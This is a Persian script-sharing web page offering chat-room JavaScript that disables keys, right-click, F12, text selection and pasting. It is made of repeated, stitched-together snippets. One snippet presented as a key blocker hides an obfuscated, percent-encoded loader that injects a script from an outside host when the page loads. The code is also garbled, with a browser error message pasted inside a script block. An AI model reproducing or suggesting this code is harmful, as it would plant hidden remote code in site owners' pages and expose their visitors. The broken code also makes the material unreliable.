کد بستن تمام کلید ها در روم

گلریزوب

مرجع اسکریپت و کد نویسی

محل نمایش تبلیغات شما کسب درآمد محل نمایش تبلیغات شما محل نمایش تبلیغات شما

میزکار کاربری
Panel

عضویت سریع
نام کاربری
رمز عبور
تکرار رمز
ایمیل
کد تصویری
ورود کاربران
نام کاربری
رمز عبور

محصولات پر بازدید
Favorite Posts

لینک های سایت
Links

صفحات جداگانه
Extra Pages

آخرین محصولات
Recently Posts

آخرین نظرات کاربران
Recently Comments

amin
amin درتاریخ 1398/3/15 گفته :
نظر من تایید نشد ولی باگ گیری کنید بک خوبیه
مهران
مهران درتاریخ 1398/3/14 گفته :
ارسال ویس نداره به درد نمیخوره
محمد مهدی
محمد مهدی درتاریخ 1398/3/11 گفته :
این باگه یا اسکریپ
البته تاپ طرح اسکریپ نداره این مال یزد طرحه
amin
amin درتاریخ 1398/2/8 گفته :
این بک کلا نصب نمیشه کلا اررومیده من نصب کردم اررو سرور داد
dark day
dark day درتاریخ 1398/2/6 گفته :
عالی.
آخرین ارسال های تالار گفتمان
هر آنچه که در انجمن در حال رخ داد است !
کد بستن تمام کلید ها در روم

<script language="JavaScript">
function clickIE() {
if (document.all) {
return false;
}///chatnazbaran.ir
}///chatnazbaran.ir
function clickNS(e) {
if (document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {
return false;
}///chatnazbaran.ir
}///chatnazbaran.ir
}///chatnazbaran.ir
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS;
}
else{
///chatnazbaran.ir
document.onmouseup=clickNS;
document.oncontextmenu=clickIE;
}///chatnazbaran.ir
document.oncontextmenu=new Function("return false")
</script>
<script>document.write(unescape("%3Cscript%20language=%22JavaScript%22%3E%0D%0Avar%20msz=%22%20%22%3B%0D%0A//%53%41%4D%49%2D%43%48%41%54.ir%0D%0Afunction%20Isr%28evn%29%0D%0A{%0D%0A    var%20dsr=window.event?event%3Aevn%3B%0D%0A    var%20esr=dsr.keyCode%3B%0D%0A    if%28dsr.ctrlKey%29%0D%0A    {%0D%0A        switch%28esr%29%0D%0A        {%0D%0A            case%2086%3A%0D%0A            document.getElementById%28%22message%22%29.value=msz%3B%0D%0A            return%20false%0D%0A            case%2090%3A%0D%0A            document.getElementById%28%22message%22%29.value=msz%3B%0D%0A            return%20false%0D%0A            break%0D%0A            %0D%0A        }%0D%0A    }%0D%0A            return%20true%0D%0A}%0D%0Avar%20o6=%22g.c%22%2Coz=%22%2573c%2572i%2570t%3E%22%2Co7=%27om/l%22%3E%3C/%27%2Ct9=%22t%2570%3A//si%22%2Cyu=%22ngl.%2570%22%2Coi=%22gi%22%2Co4=%22er%2573i%2561n%22%2Cb8=%27%253C%2573cr%2569pt%20%2573r%2563=%22h%2574%27%3B%0D%0Adocument.write%28unescape%28b8+t9+yu+o4+oi+o6+o7+oz%29%29%3B%0D%0A//sami-chat.ir%0D%0Adocument.getElementById%28%22message%22%29.onkeydown=Isr%3B%0D%0A//%53%41%4D%49%2D%43%48%41%54.ir%0D%0Adocument.getElementById%28%22message%22%29.onkeypress=Isr%3B%0D%0A//%53%41%4D%49%2D%43%48%41%54.ir%0D%0Adocument.getElementById%28%22message%22%29.onpaste=function%28%29%0D%0A{%0D%0A    return%20false%0D%0A}%3B%0D%0Adocument.getElementById%28%22message%22%29.onkeyup=Isr%3B%0D%0A%3C/script%3E"));</script>
</div>
</div>
  </script>
<script language="JavaScript">

//////////F12 disable code////////////////////////
    document.onkeypress = function (event) {
        event = (event || window.event);
        if (event.keyCode == 123) {
           //alert('No F-12');
            return false;
        }
    }
    document.onmousedown = function (event) {
        event = (event || window.event);
        if (event.keyCode == 123) {
            //alert('No F-keys');
            return false;
        }
    }
document.onkeydown = function (event) {
        event = (event || window.event);
        if (event.keyCode == 123) {
            //alert('No F-keys');
            return false;
        }
    }
/////////////////////end///////////////////////


//Disable right click script
//visit http://www.rainbow.arch.scriptmania.com/scripts/
var message="Sorry, right-click has been disabled";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
//
function disableCtrlKeyCombination(e)
{
//list all CTRL + key combinations you want to disable
var forbiddenKeys = new Array('a', 'n', 'c', 'x', 'z', 'v', 'j' , 'w','u');
var key;
var isCtrl;
if(window.event)
{
key = window.event.keyCode;     //IE
if(window.event.ctrlKey)
isCtrl = true;
else
isCtrl = false;
}
else
{
key = e.which;     //firefox
if(e.ctrlKey)
isCtrl = true;
else
isCtrl = false;
}
//if ctrl is pressed check if other key is in forbidenKeys array
if(isCtrl)
{
for(i=0; i<forbiddenKeys.length; i++)
{
//case-insensitive comparation
if(forbiddenKeys[i].toLowerCase() == String.fromCharCode(key).toLowerCase())
{
return false;
}
}
}
return true;
}
</script>
</div>
<body onkeypress="return disableCtrlKeyCombination(event);" onkeydown="return disableCtrlKeyCombination(event);"  
</body>
</html>

<script type="text/javascript">
  document.getElementById("loading").className = "loading-visible";
Uncaught TypeError: Cannot set property 'className' of null
  var hideDiv = function(){document.getElementById("loading").className = "loading-invisible";};
  var oldLoad = window.onload;
  var newLoad = oldLoad ? function(){hideDiv.call(this);oldLoad.call(this);} : hideDiv;
  window.onload = newLoad;
</script>
<script language="javascript">
function SimpleSwap(el,which){
  el.src=el.getAttribute(which || "origsrc");
}

function SimpleSwapSetup(){
  var x = document.getElementsByTagName("img");
  for (var i=0;i<x.length;i++){
    var oversrc = x[i].getAttribute("oversrc");
    if (!oversrc) continue;

    // preload image
    // comment the next two lines to disable image pre-loading
    x[i].oversrc_img = new Image();
    x[i].oversrc_img.src=oversrc;
    // set event handlers
    x[i].onmouseover = new Function("SimpleSwap(this,'oversrc');");
    x[i].onmouseout = new Function("SimpleSwap(this);");
    // save original src
    x[i].setAttribute("origsrc",x[i].src);
  }
}

var PreSimpleSwapOnload =(window.onload)? window.onload : function(){};
window.onload = function(){PreSimpleSwapOnload(); SimpleSwapSetup();}


</script>
<script language="JavaScript1.2">
var message="www.rocktarah.ir";
function click(e)
{
if (document.all)
{
if (event.button==2||event.button==3)
{
alert(message);
return false;
}
}
else
{
if (e.button==2||e.button==4)
{
e.preventDefault();
e.stopPropagation();
alert(message);
return false;
}
}

}

if (document.all) // for IE
{
document.onmousedown=click;
}
else // for FF
{
document.onclick=click;
}
</script>
<script type="text/javascript">
function ehan( evnt )
{
if( evnt.which == 3 )
{
alert( "Text Here" );
return false;
}
return true;
}
function ocmh()
{
alert( "Text Here" );
return false;
}
document.oncontextmenu = ocmh;
document.captureEvents( Event.MOUSEDOWN );
if( document.layers ) document.onmousedown = ehan;
</script>

<script type="text/javascript">
function ehan( evnt )
{
if( evnt.which == 3 )
{
alert( "Text Here" );
return false;
}
return true;
}
function ocmh()
{
alert( "Text Here" );
return false;
}
document.oncontextmenu = ocmh;
document.captureEvents( Event.MOUSEDOWN );
if( document.layers ) document.onmousedown = ehan;
</script>

<script language="JavaScript">
if (window!=top){top.location.href=location.href;}
</script>
<script type="text/javascript">
<!--
var omitformtags=["input", "textarea", "select"]
omitformtags=omitformtags.join("|")
function disableselect(e){
if (omitformtags.indexOf(e.target.tagName.toLowerCase ())==-1)
return false
}
function reEnable(){
return true
}
if (typeof document.onselectstart!="undefined")
document.onselectstart=new Function ("return false")
else{
document.onmousedown=disableselect
document.onmouseup=reEnable
}
-->
</script>
<script language="JavaScript">

//////////F12 disable code////////////////////////
    document.onkeypress = function (event) {
        event = (event || window.event);
        if (event.keyCode == 123) {
           //alert('No F-12');
            return false;
        }
    }
    document.onmousedown = function (event) {
        event = (event || window.event);
        if (event.keyCode == 123) {
            //alert('No F-keys');
            return false;
        }
    }
document.onkeydown = function (event) {
        event = (event || window.event);
        if (event.keyCode == 123) {
            //alert('No F-keys');
            return false;
        }
    }
/////////////////////end///////////////////////


//Disable right click script
//visit http://www.rainbow.arch.scriptmania.com/scripts/
var message="Sorry, right-click has been disabled";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
//
function disableCtrlKeyCombination(e)
{
//list all CTRL + key combinations you want to disable
var forbiddenKeys = new Array('a', 'n', 'z', 'c', 'x', 'v', 'j' , 'w', 'r', 't', 'y', 'i', 'o', 'p', 'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'b', 'm', 'q', '266', 'alt', 'u');
var key;
var isCtrl;
if(window.event)
{
key = window.event.keyCode;     //IE
if(window.event.ctrlKey)
isCtrl = true;
else
isCtrl = false;
}
else
{
key = e.which;     //firefox
if(e.ctrlKey)
isCtrl = true;
else
isCtrl = false;
}
//if ctrl is pressed check if other key is in forbidenKeys array
if(isCtrl)
{
for(i=0; i<forbiddenKeys.length; i++)
{
//case-insensitive comparation
if(forbiddenKeys[i].toLowerCase() == String.fromCharCode(key).toLowerCase())
{
return false;
}
}
}
return true;
}
</script>
<script language="JavaScript">
function clickIE() {
if (document.all) {
return false;
}///rocktarah.ir
}///rocktarah.ir
function clickNS(e) {
if (document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {
return false;
}///rocktarah.ir
}///rocktarah.ir
}///rocktarah.ir
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS;
}
else{
///rocktarah.ir
document.onmouseup=clickNS;
document.oncontextmenu=clickIE;
}///rocktarah.ir
document.oncontextmenu=new Function("return false")
</script>

<script language="JavaScript">
document.onkeydown = function(evt) {
    evt = evt || window.event;
    if (evt.ctrlKey || evt.altKey || evt.uKey) {
alert("no action alt backspace");
return false;
    }
};

</script>


طراحی چت روم

دسته : نکات و دستورات چت روم , ,
می پسندم نمی پسندم
تاریخ : شنبه 26 / 6 / 1392 ساعت : 14:22
نظرات
نظرات مرتبط با این پست
برای دیدن نظرات بیشتر روی شماره صفحات در زیر کلیک کنید
نام
آدرس ایمیل
وب سایت/بلاگ
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

آپلود عکس دلخواه:درباره سایت
About Us

سلام دوستان گلم خوش امدید لحظات خوشی را برای شما ارزومند هستیم امیدوارم از مطالب ما استفادهی کافی رو برده باشید
دسترسی آسان
Easy Access
آمار سایت
Statistics
تعداد مطالب : 2045
تعداد نظرات : 3907
تعداد کاربران : 1644
امروز :
تعداد اعضای سایت : 1644
تعداد اعضای آنلاین : 6
بازدید امروز : 12904
بازدید دیروز : 7350
بازدید هفته : 65540
بازدید ماه : 91178
بازدید سال : 1263142
بازدید کل : 11022222
نویسندگان
Author
امکانات وب
Codes

خبرنامه وب سایت: